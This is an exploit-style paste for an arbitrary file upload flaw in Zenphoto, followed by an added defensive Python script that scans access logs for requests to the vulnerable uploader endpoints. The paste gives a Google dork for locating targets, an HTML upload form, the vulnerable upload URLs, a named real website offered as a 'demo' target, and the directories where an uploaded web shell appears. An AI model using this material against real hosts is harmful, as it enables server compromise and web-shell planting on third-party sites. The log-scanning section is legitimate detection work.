- # Exploit Title: Zenphoto - Arbitrary File Upload Vulnerability
- # Google Dork: inurl:/zp-core/setup/
- # Date: 19/07/2016
- # Affected Software: ZenPhoto (http://www.zenphoto.org/)
- # Version: Any Version
- # Tested on: Windows, Linux
- # Author : AnoaGhost
- Exploit CSRF :
- <form method="post" action="http://site.com/path/" enctype="multipart/form-data">
- <input type="file" name="files[]"/>
- <input type="submit"/></form>
- Poc :
- http://site.com/path/zp-core/zp-extensions/uploader_jQuery/upload_form.php
- http://site.com/path/zp-core/zp-extensions/uploader_jQuery/uploader.php
- Demo ?
- http://svisimaging.be/portfolio_gallery/zp-core/zp-extensions/uploader_jQuery/upload_form.php
- Shell Path
- http://site.com/path/portfolio_gallery/
- http://site.com/path/portfolio_gallery/cache/Product/
- *Note: If the file has been uploaded and the shell does not show up, look in another directory, or the target is not vulnerable, that's all :)
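
For defenders triaging a Zenphoto host, the following added example (not part of the original paste) scans web server access-log lines for requests to the two uploader_jQuery endpoints listed above and for a script then served to the same client from outside zp-core. The Combined Log Format, the extension list, the allowlist and the sample log lines are assumptions made for illustration.

```python
import re

# Endpoints named in the paste above; everything else here is an assumption.
UPLOADER_RE = re.compile(
    r"/zp-core/zp-extensions/uploader_jQuery/(upload_form|uploader)\.php", re.I)
# Assumed set of server-executable extensions; match it to your handler mappings.
SCRIPT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Assumed allowlist of the site's own front-end scripts.
KNOWN_SCRIPTS = {"index.php"}
# Combined Log Format: ip ident user [time] "METHOD target proto" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)[^"]*" (\d{3}) ')

def scan(lines):
    """Return (kind, ip, time, path) findings from access-log lines."""
    findings, uploaders = [], set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        ip, ts, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        if UPLOADER_RE.search(path):
            if method == "POST" and status.startswith("2"):
                uploaders.add(ip)  # remember clients whose upload was accepted
                findings.append(("upload_post", ip, ts, path))
            else:
                findings.append(("uploader_probe", ip, ts, path))
        elif (ip in uploaders and status == "200"
              and SCRIPT_RE.search(path) and "/zp-core/" not in path
              and path.rsplit("/", 1)[-1] not in KNOWN_SCRIPTS):
            # Script served from an album or cache directory after an upload.
            findings.append(("script_after_upload", ip, ts, path))
    return findings

# Constructed sample log lines (documentation addresses, invented file name).
SAMPLE = [
    '198.51.100.7 - - [19/Jul/2016:10:00:01 +0000] "GET /gallery/zp-core/zp-extensions/uploader_jQuery/upload_form.php HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [19/Jul/2016:10:00:09 +0000] "POST /gallery/zp-core/zp-extensions/uploader_jQuery/uploader.php HTTP/1.1" 200 88 "-" "-"',
    '203.0.113.5 - - [19/Jul/2016:10:00:11 +0000] "GET /gallery/index.php?album=Product HTTP/1.1" 200 9000 "-" "-"',
    '198.51.100.7 - - [19/Jul/2016:10:00:15 +0000] "GET /gallery/cache/Product/x.php HTTP/1.1" 200 17 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding, sep="\t")
```

A `script_after_upload` finding is a triage lead, not proof of compromise; confirm by inspecting the file on disk.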